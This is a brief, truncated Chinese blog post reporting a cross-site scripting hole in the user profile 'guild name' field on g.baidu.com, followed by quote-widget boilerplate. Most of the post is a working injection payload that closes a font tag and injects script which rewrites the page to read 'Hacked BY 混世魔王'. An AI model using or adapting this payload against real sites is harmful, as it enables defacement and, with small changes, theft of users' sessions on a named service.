在http://g.baidu.com/ 的用户资料存在XSS. 在个人资料,公会名称这里闭和font标签就能XSS, 修改成为 <font color=”#004ca9″>”><script>document.write(‘<body onload=”document.write(‘Hacked BY 混世魔王’);”‘)</script><”</font></div> <scr…
Quote saved.
Login to quote this blog
Failed to save quote. Please try again later.
You cannot quote because this article is private.